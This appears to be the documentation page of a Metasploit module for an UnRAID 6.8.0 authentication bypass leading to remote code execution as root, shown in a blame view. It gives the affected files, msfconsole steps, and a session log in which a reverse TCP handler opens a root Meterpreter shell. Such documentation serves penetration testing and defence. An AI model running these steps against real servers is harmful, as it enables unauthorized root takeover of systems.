2020-03-20 15:33:20 +01:00
|
|
|
## Vulnerable Application
|
|
|
|
|
|
2020-03-21 11:44:35 +01:00
|
|
|
This module has been tested on UnRAID 6.8.0 without any configuration except setting a root password. Only UnRAID 6.8.0 is affected.
|
2020-03-20 15:33:20 +01:00
|
|
|
|
|
|
|
|
### Description
|
|
|
|
|
|
|
|
|
|
This module exploits an authentication bypass vulnerability caused by an insecure whitelisting mechanism in `auth_request.php` and then
|
|
|
|
|
performs remote code execution as root by abusing the *extract* function used in the `template.php` file.
|
|
|
|
|
|
|
|
|
|
### Testing Environment
|
|
|
|
|
|
|
|
|
|
Setup [Unraid 6.8.0](https://s3.amazonaws.com/dnld.lime-technology.com/stable/unRAIDServer-6.8.0-x86_64.zip)
|
|
|
|
|
according to the [UnRAID Getting Started](https://wiki.unraid.net/UnRAID_6/Getting_Started) guide.
|
|
|
|
|
|
|
|
|
|
## Verification Steps
|
|
|
|
|
|
|
|
|
|
1. Setup UnRAID 6.8.0
|
|
|
|
|
2. Start `msfconsole`
|
2020-03-21 11:44:35 +01:00
|
|
|
3. `use exploit/linux/http/unraid_auth_bypass_exec`
|
2020-03-20 15:33:20 +01:00
|
|
|
4. `set RHOST [UNRAID]`
|
|
|
|
|
5. `check`
|
|
|
|
|
6. `run`
|
|
|
|
|
7. You should get a new *root* session
|
|
|
|
|
|
|
|
|
|
## Options
|
|
|
|
|
|
2020-03-21 11:44:35 +01:00
|
|
|
**TARGETURI** : The URI of the Unraid application
|
2020-03-20 15:33:20 +01:00
|
|
|
|
|
|
|
|
## Scenarios
|
|
|
|
|
|
|
|
|
|
```
|
2020-03-21 11:44:35 +01:00
|
|
|
msf5 > use exploit/linux/http/unraid_auth_bypass_exec.rb
|
|
|
|
|
msf5 exploit(linux/http/unraid_auth_bypass_exec) > set RHOSTS 10.10.0.173
|
2020-03-20 15:33:20 +01:00
|
|
|
RHOSTS => 10.10.0.173
|
2020-03-21 11:44:35 +01:00
|
|
|
msf5 exploit(linux/http/unraid_auth_bypass_exec) > check
|
2020-03-20 15:33:20 +01:00
|
|
|
[*] 10.10.0.173:80 - The target appears to be vulnerable.
|
2020-03-21 11:44:35 +01:00
|
|
|
msf5 exploit(linux/http/unraid_auth_bypass_exec) > run
|
2020-03-20 15:33:20 +01:00
|
|
|
|
|
|
|
|
[*] Started reverse TCP handler on 10.10.0.161:4444
|
|
|
|
|
[*] Sending stage (38288 bytes) to 10.10.0.173
|
|
|
|
|
[*] Meterpreter session 1 opened (10.10.0.161:4444 -> 10.10.0.173:46894) at 2020-03-20 15:26:40 +0100
|
2020-03-21 11:44:35 +01:00
|
|
|
[+] Request timed out, OK if running a non-forking/blocking payload...
|
2020-03-20 15:33:20 +01:00
|
|
|
|
|
|
|
|
meterpreter > getuid
|
|
|
|
|
Server username: root (0)
|
|
|
|
|
```
|